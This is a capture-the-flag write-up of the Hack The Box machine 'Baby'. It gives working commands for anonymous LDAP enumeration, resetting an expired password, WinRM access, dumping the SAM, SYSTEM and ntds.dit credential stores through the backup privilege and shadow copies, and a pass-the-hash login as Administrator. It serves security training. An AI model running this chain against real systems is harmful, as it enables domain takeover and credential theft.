
HTB: Baby
An anonymous LDAP bind hands over the user list, and one account has its initial password typed into the description field. A disabled account missed by the summary turns into a shell, and the backup privilege turns that shell into the whole directory.
We kick things off with an nmap scan and can see this has an LDAP system, so let's begin enumeration.

Checking LDAP for active users we can get a username list going.
nxc ldap 10.129.99.131 -u '' -p '' --active-users

Two things here. The server answers an anonymous bind at all, which gives us the whole user list for free. And Teresa Bell has her initial password written into the description field, where any unauthenticated reader can see it.
That tool only shows us a summary though. Let's pull everything LDAP will give us and read it properly.
ldapsearch -x -h 10.129.99.131 -p 389 -b "DC=baby,DC=vl" -D "" -w "" "*" "+" > ldap_everything.txt

Running through the full dump we come across a Caroline Robinson who wasn't in the list we built. She didn't show up earlier because the summary only returns enabled accounts, and group membership records her regardless. Let's test this user with the password we already have.
nxc smb 10.129.99.131 -u 'Caroline.Robinson' -p 'BabyStart123!'

We get a must-change status back. That means the password is correct but expired, which is effectively a yes with an extra step. The account has never been logged into, so we can set the password ourselves.
impacket-changepasswd 'baby.vl/Caroline.Robinson:BabyStart123!@BabyDC.baby.vl' \
-newpass 'Password123!' -protocol smb-samr

Now let's see if they have WinRM access.
nxc winrm baby.vl -u 'Caroline.Robinson' -p 'Password123!'

They do. Let's log in.
evil-winrm -i baby.vl -u Caroline.Robinson -p 'Password123!'

We made it into the system. Heading over to the user's desktop we find the user flag.

Now let's enumerate the account and check the privileges.
whoami /all

We have the backup privilege, which lets us read any file on disk regardless of its permissions. That means we can dump the registry hives.
reg save HKLM\SYSTEM C:\Users\Caroline.Robinson\Desktop\sys.hive
reg save HKLM\SAM C:\Users\Caroline.Robinson\Desktop\sam.hive

We can't get the security one, but we have the other two. Note the forward slashes fail here; the command only works with backslashes.
The local hives alone won't give us the domain though, so we also want the directory database. That file is locked while the system is running, so we take a shadow copy of the volume and read it from there.
"set context persistent nowriters
set metadata C:\Windows\Temp\meta.cab
set verbose on
add volume C: alias cdrive
create
expose %cdrive% Z:" | Out-File -Encoding ascii C:\Windows\Temp\ds.txt
diskshadow /s C:\Windows\Temp\ds.txt
robocopy /b Z:\Windows\NTDS C:\Windows\Temp ntds.dit

The backup flag on robocopy is what makes that copy work, since it tells the tool to use the backup privilege rather than normal file permissions. Now we download it all to Kali and run secretsdump.
impacket-secretsdump -ntds ntds.dit -system sys.hive LOCAL | tee ntds.secrets

That gives us every credential in the domain. Let's grab the Administrator hash and log in with pass-the-hash.
evil-winrm -i baby.vl -u Administrator -H '<ADMIN_NT>'
Heading over to the admin desktop we can find the root flag.

This box felt a little different, with a lot more LDAP enumeration surface. Overall it was a good one for learning to dig into LDAP for information you might have missed on the surface.
